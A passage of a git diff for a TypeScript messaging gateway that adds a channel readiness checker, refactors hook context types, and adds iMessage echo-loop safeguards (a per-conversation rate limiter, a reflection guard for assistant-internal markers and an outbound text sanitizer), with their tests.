lastEventAt: Date.now() - 1_000, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 300_000 }); + vi.useRealTimers(); + }); + + it("ignores disabled and unconfigured channels", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 5 * 60_000; + const manager = createManager( + snapshotWith({ + discord: { + running: false, + enabled: false, + configured: true, + lastStartAt: startedAt, + }, + telegram: { + running: false, + enabled: true, + configured: false, + lastStartAt: startedAt, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 300_000 }); + vi.useRealTimers(); + }); + + it("uses startup grace before marking disconnected channels not ready", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 30_000; + const manager = createManager( + snapshotWith({ + discord: { + running: true, + connected: false, + enabled: true, + configured: true, + lastStartAt: startedAt, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 30_000 }); + vi.useRealTimers(); + }); + + it("reports disconnected managed channels after startup grace", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 5 * 60_000; + const manager = createManager( + snapshotWith({ + discord: { + running: true, + connected: false, + enabled: true, + configured: true, + lastStartAt: startedAt, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: false, failing: ["discord"], uptimeMs: 300_000 }); + vi.useRealTimers(); + }); + + it("keeps restart-pending channels ready during reconnect backoff", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 5 * 60_000; + const manager = createManager( + snapshotWith({ + discord: { + running: false, + restartPending: true, + reconnectAttempts: 3, + enabled: true, + configured: true, + lastStartAt: startedAt - 30_000, + lastStopAt: Date.now() - 5_000, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 300_000 }); + vi.useRealTimers(); + }); + + it("treats stale-socket channels as ready to avoid pulling healthy idle pods", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 31 * 60_000; + const manager = createManager( + snapshotWith({ + discord: { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: startedAt, + lastEventAt: Date.now() - 31 * 60_000, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 1_860_000 }); + vi.useRealTimers(); + }); + + it("keeps telegram long-polling channels ready without stale-socket classification", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 31 * 60_000; + const manager = createManager( + snapshotWith({ + telegram: { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: startedAt, + lastEventAt: null, + }, + }), + ); + + const readiness = createReadinessChecker({ channelManager: manager, startedAt }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 1_860_000 }); + vi.useRealTimers(); + }); + + it("caches readiness snapshots briefly to keep repeated probes cheap", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 5 * 60_000; + const manager = createManager( + snapshotWith({ + discord: { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: startedAt, + lastEventAt: Date.now() - 1_000, + }, + }), + ); + + const readiness = createReadinessChecker({ + channelManager: manager, + startedAt, + cacheTtlMs: 1_000, + }); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 300_000 }); + vi.advanceTimersByTime(500); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 300_500 }); + expect(manager.getRuntimeSnapshot).toHaveBeenCalledTimes(1); + + vi.advanceTimersByTime(600); + expect(readiness()).toEqual({ ready: true, failing: [], uptimeMs: 301_100 }); + expect(manager.getRuntimeSnapshot).toHaveBeenCalledTimes(2); + vi.useRealTimers(); + }); +}); diff --git a/src/gateway/server/readiness.ts b/src/gateway/server/readiness.ts new file mode 100644 index 00000000000..527dad24949 --- /dev/null +++ b/src/gateway/server/readiness.ts @@ -0,0 +1,80 @@ +import type { ChannelAccountSnapshot } from "../../channels/plugins/types.js"; +import { + DEFAULT_CHANNEL_CONNECT_GRACE_MS, + DEFAULT_CHANNEL_STALE_EVENT_THRESHOLD_MS, + evaluateChannelHealth, + type ChannelHealthPolicy, + type ChannelHealthEvaluation, +} from "../channel-health-policy.js"; +import type { ChannelManager } from "../server-channels.js"; + +export type ReadinessResult = { + ready: boolean; + failing: string[]; + uptimeMs: number; +}; + +export type ReadinessChecker = () => ReadinessResult; + +const DEFAULT_READINESS_CACHE_TTL_MS = 1_000; + +function shouldIgnoreReadinessFailure( + accountSnapshot: ChannelAccountSnapshot, + health: ChannelHealthEvaluation, +): boolean { + if (health.reason === "unmanaged" || health.reason === "stale-socket") { + return true; + } + // Channel restarts spend time in backoff with running=false before the next + // lifecycle re-enters startup grace. Keep readiness green during that handoff + // window, but still surface hard failures once restart attempts are exhausted. + return health.reason === "not-running" && accountSnapshot.restartPending === true; +} + +export function createReadinessChecker(deps: { + channelManager: ChannelManager; + startedAt: number; + cacheTtlMs?: number; +}): ReadinessChecker { + const { channelManager, startedAt } = deps; + const cacheTtlMs = Math.max(0, deps.cacheTtlMs ?? DEFAULT_READINESS_CACHE_TTL_MS); + let cachedAt = 0; + let cachedState: Omit | null = null; + + return (): ReadinessResult => { + const now = Date.now(); + const uptimeMs = now - startedAt; + if (cachedState && now - cachedAt < cacheTtlMs) { + return { ...cachedState, uptimeMs }; + } + + const snapshot = channelManager.getRuntimeSnapshot(); + const failing: string[] = []; + + for (const [channelId, accounts] of Object.entries(snapshot.channelAccounts)) { + if (!accounts) { + continue; + } + for (const accountSnapshot of Object.values(accounts)) { + if (!accountSnapshot) { + continue; + } + const policy: ChannelHealthPolicy = { + now, + staleEventThresholdMs: DEFAULT_CHANNEL_STALE_EVENT_THRESHOLD_MS, + channelConnectGraceMs: DEFAULT_CHANNEL_CONNECT_GRACE_MS, + channelId, + }; + const health = evaluateChannelHealth(accountSnapshot, policy); + if (!health.healthy && !shouldIgnoreReadinessFailure(accountSnapshot, health)) { + failing.push(channelId); + break; + } + } + } + + cachedAt = now; + cachedState = { ready: failing.length === 0, failing }; + return { ...cachedState, uptimeMs }; + }; +} diff --git a/src/gateway/test-helpers.server.ts b/src/gateway/test-helpers.server.ts index ab5269f09b5..eca3a107e69 100644 --- a/src/gateway/test-helpers.server.ts +++ b/src/gateway/test-helpers.server.ts @@ -339,6 +339,46 @@ async function startGatewayServerWithRetries(params: { throw new Error("failed to start gateway server after retries"); } +async function waitForWebSocketOpen(ws: WebSocket, timeoutMs = 10_000): Promise { + await new Promise((resolve, reject) => { + const timer = setTimeout(() => reject(new Error("timeout waiting for ws open")), timeoutMs); + const cleanup = () => { + clearTimeout(timer); + ws.off("open", onOpen); + ws.off("error", onError); + ws.off("close", onClose); + }; + const onOpen = () => { + cleanup(); + resolve(); + }; + const onError = (err: unknown) => { + cleanup(); + reject(err instanceof Error ? err : new Error(String(err))); + }; + const onClose = (code: number, reason: Buffer) => { + cleanup(); + reject(new Error(`closed ${code}: ${reason.toString()}`)); + }; + ws.once("open", onOpen); + ws.once("error", onError); + ws.once("close", onClose); + }); +} + +async function openTrackedWebSocket(params: { + port: number; + headers?: Record; +}): Promise { + const ws = new WebSocket( + `ws://127.0.0.1:${params.port}`, + params.headers ? { headers: params.headers } : undefined, + ); + trackConnectChallengeNonce(ws); + await waitForWebSocketOpen(ws); + return ws; +} + export async function withGatewayServer( fn: (ctx: { port: number; server: Awaited> }) => Promise, opts?: { port?: number; serverOptions?: GatewayServerOptions }, @@ -371,33 +411,10 @@ export async function createGatewaySuiteHarness(opts?: { port: started.port, server: started.server, openWs: async (headers?: Record) => { - const ws = new WebSocket(`ws://127.0.0.1:${started.port}`, headers ? { headers } : undefined); - trackConnectChallengeNonce(ws); - await new Promise((resolve, reject) => { - const timer = setTimeout(() => reject(new Error("timeout waiting for ws open")), 10_000); - const cleanup = () => { - clearTimeout(timer); - ws.off("open", onOpen); - ws.off("error", onError); - ws.off("close", onClose); - }; - const onOpen = () => { - cleanup(); - resolve(); - }; - const onError = (err: unknown) => { - cleanup(); - reject(err instanceof Error ? err : new Error(String(err))); - }; - const onClose = (code: number, reason: Buffer) => { - cleanup(); - reject(new Error(`closed ${code}: ${reason.toString()}`)); - }; - ws.once("open", onOpen); - ws.once("error", onError); - ws.once("close", onClose); + return await openTrackedWebSocket({ + port: started.port, + headers, }); - return ws; }, close: async () => { await started.server.close(); @@ -431,35 +448,7 @@ export async function startServerWithClient( port = started.port; const server = started.server; - const ws = new WebSocket( - `ws://127.0.0.1:${port}`, - wsHeaders ? { headers: wsHeaders } : undefined, - ); - trackConnectChallengeNonce(ws); - await new Promise((resolve, reject) => { - const timer = setTimeout(() => reject(new Error("timeout waiting for ws open")), 10_000); - const cleanup = () => { - clearTimeout(timer); - ws.off("open", onOpen); - ws.off("error", onError); - ws.off("close", onClose); - }; - const onOpen = () => { - cleanup(); - resolve(); - }; - const onError = (err: unknown) => { - cleanup(); - reject(err instanceof Error ? err : new Error(String(err))); - }; - const onClose = (code: number, reason: Buffer) => { - cleanup(); - reject(new Error(`closed ${code}: ${reason.toString()}`)); - }; - ws.once("open", onOpen); - ws.once("error", onError); - ws.once("close", onClose); - }); + const ws = await openTrackedWebSocket({ port, headers: wsHeaders }); return { server, ws, port, prevToken: prev, envSnapshot }; } diff --git a/src/hooks/frontmatter.ts b/src/hooks/frontmatter.ts index aa9e75537d3..686f966ccbf 100644 --- a/src/hooks/frontmatter.ts +++ b/src/hooks/frontmatter.ts @@ -1,5 +1,6 @@ import { parseFrontmatterBlock } from "../markdown/frontmatter.js"; import { + applyOpenClawManifestInstallCommonFields, getFrontmatterString, normalizeStringList, parseOpenClawManifestInstallBase, @@ -27,19 +28,12 @@ function parseInstallSpec(input: unknown): HookInstallSpec | undefined { return undefined; } const { raw } = parsed; - const spec: HookInstallSpec = { - kind: parsed.kind as HookInstallSpec["kind"], - }; - - if (parsed.id) { - spec.id = parsed.id; - } - if (parsed.label) { - spec.label = parsed.label; - } - if (parsed.bins) { - spec.bins = parsed.bins; - } + const spec = applyOpenClawManifestInstallCommonFields( + { + kind: parsed.kind as HookInstallSpec["kind"], + }, + parsed, + ); if (typeof raw.package === "string") { spec.package = raw.package; } diff --git a/src/hooks/internal-hooks.ts b/src/hooks/internal-hooks.ts index 625261e3c16..b73dcb75fab 100644 --- a/src/hooks/internal-hooks.ts +++ b/src/hooks/internal-hooks.ts @@ -97,7 +97,7 @@ export type MessageSentHookEvent = InternalHookEvent & { context: MessageSentHookContext; }; -export type MessageTranscribedHookContext = { +type MessageEnrichedBodyHookContext = { /** Sender identifier (e.g., phone number, user ID) */ from?: string; /** Recipient identifier */ @@ -106,8 +106,6 @@ export type MessageTranscribedHookContext = { body?: string; /** Enriched body shown to the agent, including transcript */ bodyForAgent?: string; - /** The transcribed text from audio */ - transcript: string; /** Unix timestamp when the message was received */ timestamp?: number; /** Channel identifier (e.g., "telegram", "whatsapp") */ @@ -132,45 +130,20 @@ export type MessageTranscribedHookContext = { mediaType?: string; }; +export type MessageTranscribedHookContext = MessageEnrichedBodyHookContext & { + /** The transcribed text from audio */ + transcript: string; +}; + export type MessageTranscribedHookEvent = InternalHookEvent & { type: "message"; action: "transcribed"; context: MessageTranscribedHookContext; }; -export type MessagePreprocessedHookContext = { - /** Sender identifier (e.g., phone number, user ID) */ - from?: string; - /** Recipient identifier */ - to?: string; - /** Original raw message body */ - body?: string; - /** Fully enriched body shown to the agent (transcripts, image descriptions, link summaries) */ - bodyForAgent?: string; +export type MessagePreprocessedHookContext = MessageEnrichedBodyHookContext & { /** Transcribed audio text, if the message contained audio */ transcript?: string; - /** Unix timestamp when the message was received */ - timestamp?: number; - /** Channel identifier (e.g., "telegram", "whatsapp") */ - channelId: string; - /** Conversation/chat ID */ - conversationId?: string; - /** Message ID from the provider */ - messageId?: string; - /** Sender user ID */ - senderId?: string; - /** Sender display name */ - senderName?: string; - /** Sender username */ - senderUsername?: string; - /** Provider name */ - provider?: string; - /** Surface name */ - surface?: string; - /** Path to the media file, if present */ - mediaPath?: string; - /** MIME type of the media, if present */ - mediaType?: string; /** Whether this message was sent in a group/channel context */ isGroup?: boolean; /** Group or channel identifier, if applicable */ diff --git a/src/hooks/message-hook-mappers.ts b/src/hooks/message-hook-mappers.ts index be51245a545..1cdd12a93ac 100644 --- a/src/hooks/message-hook-mappers.ts +++ b/src/hooks/message-hook-mappers.ts @@ -213,23 +213,10 @@ export function toInternalMessageTranscribedContext( canonical: CanonicalInboundMessageHookContext, cfg: OpenClawConfig, ): MessageTranscribedHookContext & { cfg: OpenClawConfig } { + const shared = toInternalInboundMessageHookContextBase(canonical); return { - from: canonical.from, - to: canonical.to, - body: canonical.body, - bodyForAgent: canonical.bodyForAgent, + ...shared, transcript: canonical.transcript ?? "", - timestamp: canonical.timestamp, - channelId: canonical.channelId, - conversationId: canonical.conversationId, - messageId: canonical.messageId, - senderId: canonical.senderId, - senderName: canonical.senderName, - senderUsername: canonical.senderUsername, - provider: canonical.provider, - surface: canonical.surface, - mediaPath: canonical.mediaPath, - mediaType: canonical.mediaType, cfg, }; } @@ -238,12 +225,22 @@ export function toInternalMessagePreprocessedContext( canonical: CanonicalInboundMessageHookContext, cfg: OpenClawConfig, ): MessagePreprocessedHookContext & { cfg: OpenClawConfig } { + const shared = toInternalInboundMessageHookContextBase(canonical); + return { + ...shared, + transcript: canonical.transcript, + isGroup: canonical.isGroup, + groupId: canonical.groupId, + cfg, + }; +} + +function toInternalInboundMessageHookContextBase(canonical: CanonicalInboundMessageHookContext) { return { from: canonical.from, to: canonical.to, body: canonical.body, bodyForAgent: canonical.bodyForAgent, - transcript: canonical.transcript, timestamp: canonical.timestamp, channelId: canonical.channelId, conversationId: canonical.conversationId, @@ -255,9 +252,6 @@ export function toInternalMessagePreprocessedContext( surface: canonical.surface, mediaPath: canonical.mediaPath, mediaType: canonical.mediaType, - isGroup: canonical.isGroup, - groupId: canonical.groupId, - cfg, }; } diff --git a/src/imessage/monitor/deliver.ts b/src/imessage/monitor/deliver.ts index 71825be8d0b..fc949d3cfc1 100644 --- a/src/imessage/monitor/deliver.ts +++ b/src/imessage/monitor/deliver.ts @@ -7,6 +7,7 @@ import type { RuntimeEnv } from "../../runtime.js"; import type { createIMessageRpcClient } from "../client.js"; import { sendMessageIMessage } from "../send.js"; import type { SentMessageCache } from "./echo-cache.js"; +import { sanitizeOutboundText } from "./sanitize-outbound.js"; export async function deliverReplies(params: { replies: ReplyPayload[]; @@ -30,7 +31,7 @@ export async function deliverReplies(params: { const chunkMode = resolveChunkMode(cfg, "imessage", accountId); for (const payload of replies) { const mediaList = payload.mediaUrls ?? (payload.mediaUrl ? [payload.mediaUrl] : []); - const rawText = payload.text ?? ""; + const rawText = sanitizeOutboundText(payload.text ?? ""); const text = convertMarkdownTables(rawText, tableMode); if (!text && mediaList.length === 0) { continue; diff --git a/src/imessage/monitor/echo-cache.ts b/src/imessage/monitor/echo-cache.ts index c68ff04b970..06f5ee847f5 100644 --- a/src/imessage/monitor/echo-cache.ts +++ b/src/imessage/monitor/echo-cache.ts @@ -8,7 +8,9 @@ export type SentMessageCache = { has: (scope: string, lookup: SentMessageLookup) => boolean; }; -const SENT_MESSAGE_TEXT_TTL_MS = 5000; +// Keep the text fallback short so repeated user replies like "ok" are not +// suppressed for long; delayed reflections should match the stronger message-id key. +const SENT_MESSAGE_TEXT_TTL_MS = 5_000; const SENT_MESSAGE_ID_TTL_MS = 60_000; function normalizeEchoTextKey(text: string | undefined): string | null { diff --git a/src/imessage/monitor/inbound-processing.ts b/src/imessage/monitor/inbound-processing.ts index 8a4979df965..d042f1f1a0f 100644 --- a/src/imessage/monitor/inbound-processing.ts +++ b/src/imessage/monitor/inbound-processing.ts @@ -30,6 +30,7 @@ import { isAllowedIMessageSender, normalizeIMessageHandle, } from "../targets.js"; +import { detectReflectedContent } from "./reflection-guard.js"; import type { MonitorIMessageOpts, IMessagePayload } from "./types.js"; type IMessageReplyContext = { @@ -214,7 +215,7 @@ export function resolveIMessageInboundDecision(params: { return { kind: "drop", reason: "empty body" }; } - // Echo detection: check if the received message matches a recently sent message (within 5 seconds). + // Echo detection: check if the received message matches a recently sent message. // Scope by conversation so same text in different chats is not conflated. const inboundMessageId = params.message.id != null ? String(params.message.id) : undefined; if (params.echoCache && (messageText || inboundMessageId)) { @@ -237,6 +238,17 @@ export function resolveIMessageInboundDecision(params: { } } + // Reflection guard: drop inbound messages that contain assistant-internal + // metadata markers. These indicate outbound content was reflected back as + // inbound, which causes recursive echo amplification. + const reflection = detectReflectedContent(messageText); + if (reflection.isReflection) { + params.logVerbose?.( + `imessage: dropping reflected assistant content (markers: ${reflection.matchedLabels.join(", ")})`, + ); + return { kind: "drop", reason: "reflected assistant content" }; + } + const replyContext = describeReplyContext(params.message); const createdAt = params.message.created_at ? Date.parse(params.message.created_at) : undefined; const historyKey = isGroup diff --git a/src/imessage/monitor/loop-rate-limiter.test.ts b/src/imessage/monitor/loop-rate-limiter.test.ts new file mode 100644 index 00000000000..d156ffc2c36 --- /dev/null +++ b/src/imessage/monitor/loop-rate-limiter.test.ts @@ -0,0 +1,50 @@ +import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"; +import { createLoopRateLimiter } from "./loop-rate-limiter.js"; + +describe("createLoopRateLimiter", () => { + beforeEach(() => { + vi.useFakeTimers(); + }); + + afterEach(() => { + vi.useRealTimers(); + }); + + it("allows messages below the threshold", () => { + const limiter = createLoopRateLimiter({ windowMs: 10_000, maxHits: 3 }); + limiter.record("conv:1"); + limiter.record("conv:1"); + expect(limiter.isRateLimited("conv:1")).toBe(false); + }); + + it("rate limits at the threshold", () => { + const limiter = createLoopRateLimiter({ windowMs: 10_000, maxHits: 3 }); + limiter.record("conv:1"); + limiter.record("conv:1"); + limiter.record("conv:1"); + expect(limiter.isRateLimited("conv:1")).toBe(true); + }); + + it("does not cross-contaminate conversations", () => { + const limiter = createLoopRateLimiter({ windowMs: 10_000, maxHits: 2 }); + limiter.record("conv:1"); + limiter.record("conv:1"); + expect(limiter.isRateLimited("conv:1")).toBe(true); + expect(limiter.isRateLimited("conv:2")).toBe(false); + }); + + it("resets after the time window expires", () => { + const limiter = createLoopRateLimiter({ windowMs: 5_000, maxHits: 2 }); + limiter.record("conv:1"); + limiter.record("conv:1"); + expect(limiter.isRateLimited("conv:1")).toBe(true); + + vi.advanceTimersByTime(6_000); + expect(limiter.isRateLimited("conv:1")).toBe(false); + }); + + it("returns false for unknown conversations", () => { + const limiter = createLoopRateLimiter(); + expect(limiter.isRateLimited("unknown")).toBe(false); + }); +}); diff --git a/src/imessage/monitor/loop-rate-limiter.ts b/src/imessage/monitor/loop-rate-limiter.ts new file mode 100644 index 00000000000..56c234a1b14 --- /dev/null +++ b/src/imessage/monitor/loop-rate-limiter.ts @@ -0,0 +1,69 @@ +/** + * Per-conversation rate limiter that detects rapid-fire identical echo + * patterns and suppresses them before they amplify into queue overflow. + */ + +const DEFAULT_WINDOW_MS = 60_000; +const DEFAULT_MAX_HITS = 5; +const CLEANUP_INTERVAL_MS = 120_000; + +type ConversationWindow = { + timestamps: number[]; +}; + +export type LoopRateLimiter = { + /** Returns true if this conversation has exceeded the rate limit. */ + isRateLimited: (conversationKey: string) => boolean; + /** Record an inbound message for a conversation. */ + record: (conversationKey: string) => void; +}; + +export function createLoopRateLimiter(opts?: { + windowMs?: number; + maxHits?: number; +}): LoopRateLimiter { + const windowMs = opts?.windowMs ?? DEFAULT_WINDOW_MS; + const maxHits = opts?.maxHits ?? DEFAULT_MAX_HITS; + const conversations = new Map(); + let lastCleanup = Date.now(); + + function cleanup() { + const now = Date.now(); + if (now - lastCleanup < CLEANUP_INTERVAL_MS) { + return; + } + lastCleanup = now; + for (const [key, win] of conversations.entries()) { + const recent = win.timestamps.filter((ts) => now - ts <= windowMs); + if (recent.length === 0) { + conversations.delete(key); + } else { + win.timestamps = recent; + } + } + } + + return { + record(conversationKey: string) { + cleanup(); + let win = conversations.get(conversationKey); + if (!win) { + win = { timestamps: [] }; + conversations.set(conversationKey, win); + } + win.timestamps.push(Date.now()); + }, + + isRateLimited(conversationKey: string): boolean { + cleanup(); + const win = conversations.get(conversationKey); + if (!win) { + return false; + } + const now = Date.now(); + const recent = win.timestamps.filter((ts) => now - ts <= windowMs); + win.timestamps = recent; + return recent.length >= maxHits; + }, + }; +} diff --git a/src/imessage/monitor/monitor-provider.echo-cache.test.ts b/src/imessage/monitor/monitor-provider.echo-cache.test.ts index e67667c0228..4adeed4aafa 100644 --- a/src/imessage/monitor/monitor-provider.echo-cache.test.ts +++ b/src/imessage/monitor/monitor-provider.echo-cache.test.ts @@ -35,7 +35,8 @@ describe("iMessage sent-message echo cache", () => { const cache = createSentMessageCache(); cache.remember("acct:imessage:+1555", { text: "hello", messageId: "m-1" }); - vi.advanceTimersByTime(6000); + // Text fallback stays short to avoid suppressing legitimate repeated user text. + vi.advanceTimersByTime(6_000); expect(cache.has("acct:imessage:+1555", { text: "hello" })).toBe(false); expect(cache.has("acct:imessage:+1555", { messageId: "m-1" })).toBe(true); diff --git a/src/imessage/monitor/monitor-provider.ts b/src/imessage/monitor/monitor-provider.ts index 2ca8d3015f1..ffc15a4df0a 100644 --- a/src/imessage/monitor/monitor-provider.ts +++ b/src/imessage/monitor/monitor-provider.ts @@ -50,6 +50,7 @@ import { buildIMessageInboundContext, resolveIMessageInboundDecision, } from "./inbound-processing.js"; +import { createLoopRateLimiter } from "./loop-rate-limiter.js"; import { parseIMessageNotification } from "./parse-notification.js"; import { normalizeAllowList, resolveRuntime } from "./runtime.js"; import type { IMessagePayload, MonitorIMessageOpts } from "./types.js"; @@ -98,6 +99,7 @@ export async function monitorIMessageProvider(opts: MonitorIMessageOpts = {}): P ); const groupHistories = new Map(); const sentMessageCache = createSentMessageCache(); + const loopRateLimiter = createLoopRateLimiter(); const textLimit = resolveTextChunkLimit(cfg, "imessage", accountInfo.accountId); const allowFrom = normalizeAllowList(opts.allowFrom ?? imessageCfg.allowFrom); const groupAllowFrom = normalizeAllowList( @@ -253,11 +255,34 @@ export async function monitorIMessageProvider(opts: MonitorIMessageOpts = {}): P logVerbose, }); + // Build conversation key for rate limiting (used by both drop and dispatch paths). + const chatId = message.chat_id ?? undefined; + const senderForKey = (message.sender ?? "").trim(); + const conversationKey = chatId != null ? `group:${chatId}` : `dm:${senderForKey}`; + const rateLimitKey = `${accountInfo.accountId}:${conversationKey}`; + if (decision.kind === "drop") { + // Record echo/reflection drops so the rate limiter can detect sustained loops. + // Only loop-related drop reasons feed the counter; policy/mention/empty drops + // are normal and should not escalate. + const isLoopDrop = + decision.reason === "echo" || + decision.reason === "reflected assistant content" || + decision.reason === "from me"; + if (isLoopDrop) { + loopRateLimiter.record(rateLimitKey); + } + return; + } + + // After repeated echo/reflection drops for a conversation, suppress all + // remaining messages as a safety net against amplification that slips + // through the primary guards. + if (decision.kind === "dispatch" && loopRateLimiter.isRateLimited(rateLimitKey)) { + logVerbose(`imessage: rate-limited conversation ${conversationKey} (echo loop detected)`); return; } - const chatId = message.chat_id ?? undefined; if (decision.kind === "pairing") { const sender = (message.sender ?? "").trim(); if (!sender) { diff --git a/src/imessage/monitor/reflection-guard.test.ts b/src/imessage/monitor/reflection-guard.test.ts new file mode 100644 index 00000000000..d7156b93da5 --- /dev/null +++ b/src/imessage/monitor/reflection-guard.test.ts @@ -0,0 +1,107 @@ +import { describe, expect, it } from "vitest"; +import { detectReflectedContent } from "./reflection-guard.js"; + +describe("detectReflectedContent", () => { + it("returns false for empty text", () => { + expect(detectReflectedContent("").isReflection).toBe(false); + }); + + it("returns false for normal user text", () => { + const result = detectReflectedContent("Hey, what's the weather today?"); + expect(result.isReflection).toBe(false); + expect(result.matchedLabels).toEqual([]); + }); + + it("detects +#+#+#+# separator pattern", () => { + const result = detectReflectedContent("NO_REPLY +#+#+#+#+#+assistant to=final"); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("internal-separator"); + }); + + it("detects assistant to=final marker", () => { + const result = detectReflectedContent("some text assistant to=final rest"); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("assistant-role-marker"); + }); + + it("detects tags", () => { + const result = detectReflectedContent("internal reasoning"); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("thinking-tag"); + }); + + it("detects tags", () => { + const result = detectReflectedContent("secret"); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("thinking-tag"); + }); + + it("detects tags", () => { + const result = detectReflectedContent("data"); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("relevant-memories-tag"); + }); + + it("detects tags", () => { + const result = detectReflectedContent("visible"); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("final-tag"); + }); + + it("returns multiple matched labels for combined markers", () => { + const text = "NO_REPLY +#+#+#+# step assistant to=final"; + const result = detectReflectedContent(text); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels.length).toBeGreaterThanOrEqual(3); + }); + + it("ignores reflection markers inside inline code", () => { + const result = detectReflectedContent( + "Please keep `debug trace` in the example output", + ); + expect(result.isReflection).toBe(false); + expect(result.matchedLabels).toEqual([]); + }); + + it("ignores reflection markers inside fenced code blocks", () => { + const result = detectReflectedContent( + [ + "User pasted a repro snippet:", + "```xml", + "cached", + "assistant to=final", + "```", + ].join("\n"), + ); + expect(result.isReflection).toBe(false); + expect(result.matchedLabels).toEqual([]); + }); + + it("still flags markers that appear outside code blocks", () => { + const result = detectReflectedContent( + ["```xml", "inside code", "```", "", "assistant to=final"].join("\n"), + ); + expect(result.isReflection).toBe(true); + expect(result.matchedLabels).toContain("assistant-role-marker"); + }); + + it("does not flag normal code discussion about thinking", () => { + const result = detectReflectedContent("I was thinking about your question"); + expect(result.isReflection).toBe(false); + }); + + it("flags '' as reflection when it forms a complete tag", () => { + const result = detectReflectedContent("Here is my "); + expect(result.isReflection).toBe(true); + }); + + it("does not flag partial tag without closing bracket", () => { + const result = detectReflectedContent("I sent a ' phrase without closing bracket", () => { + const result = detectReflectedContent("This is a ` to avoid false-positives on phrases like "". +const THINKING_TAG_RE = /<\s*\/?\s*(?:think(?:ing)?|thought|antthinking)\b[^<>]*>/i; +const RELEVANT_MEMORIES_TAG_RE = /<\s*\/?\s*relevant[-_]memories\b[^<>]*>/i; +// Require closing `>` to avoid false-positives on phrases like "". +const FINAL_TAG_RE = /<\s*\/?\s*final\b[^<>]*>/i; + +const REFLECTION_PATTERNS: Array<{ re: RegExp; label: string }> = [ + { re: INTERNAL_SEPARATOR_RE, label: "internal-separator" }, + { re: ASSISTANT_ROLE_MARKER_RE, label: "assistant-role-marker" }, + { re: THINKING_TAG_RE, label: "thinking-tag" }, + { re: RELEVANT_MEMORIES_TAG_RE, label: "relevant-memories-tag" }, + { re: FINAL_TAG_RE, label: "final-tag" }, +]; + +export type ReflectionDetection = { + isReflection: boolean; + matchedLabels: string[]; +}; + +function hasMatchOutsideCode(text: string, re: RegExp): boolean { + const codeRegions = findCodeRegions(text); + const globalRe = new RegExp(re.source, re.flags.includes("g") ? re.flags : `${re.flags}g`); + + for (const match of text.matchAll(globalRe)) { + const start = match.index ?? -1; + if (start >= 0 && !isInsideCode(start, codeRegions)) { + return true; + } + } + + return false; +} + +/** + * Check whether an inbound message appears to be a reflection of + * assistant-originated content. Returns matched pattern labels for telemetry. + */ +export function detectReflectedContent(text: string): ReflectionDetection { + if (!text) { + return { isReflection: false, matchedLabels: [] }; + } + + const matchedLabels: string[] = []; + for (const { re, label } of REFLECTION_PATTERNS) { + if (hasMatchOutsideCode(text, re)) { + matchedLabels.push(label); + } + } + + return { + isReflection: matchedLabels.length > 0, + matchedLabels, + }; +} diff --git a/src/imessage/monitor/sanitize-outbound.test.ts b/src/imessage/monitor/sanitize-outbound.test.ts new file mode 100644 index 00000000000..ad70b558731 --- /dev/null +++ b/src/imessage/monitor/sanitize-outbound.test.ts @@ -0,0 +1,64 @@ +import { describe, expect, it } from "vitest"; +import { sanitizeOutboundText } from "./sanitize-outbound.js"; + +describe("sanitizeOutboundText", () => { + it("returns empty string unchanged", () => { + expect(sanitizeOutboundText("")).toBe(""); + }); + + it("preserves normal user-facing text", () => { + const text = "Hello! How can I help you today?"; + expect(sanitizeOutboundText(text)).toBe(text); + }); + + it("strips tags and content", () => { + const text = "internal reasoningThe answer is 42."; + expect(sanitizeOutboundText(text)).toBe("The answer is 42."); + }); + + it("strips tags and content", () => { + const text = "secretVisible reply"; + expect(sanitizeOutboundText(text)).toBe("Visible reply"); + }); + + it("strips tags", () => { + const text = "Hello world"; + expect(sanitizeOutboundText(text)).toBe("Hello world"); + }); + + it("strips tags and content", () => { + const text = "memory dataVisible"; + expect(sanitizeOutboundText(text)).toBe("Visible"); + }); + + it("strips +#+#+#+# separator patterns", () => { + const text = "NO_REPLY +#+#+#+#+#+ more internal stuff"; + expect(sanitizeOutboundText(text)).not.toContain("+#+#"); + }); + + it("strips assistant to=final markers", () => { + const text = "Some text assistant to=final more text"; + const result = sanitizeOutboundText(text); + expect(result).not.toMatch(/assistant\s+to\s*=\s*final/i); + 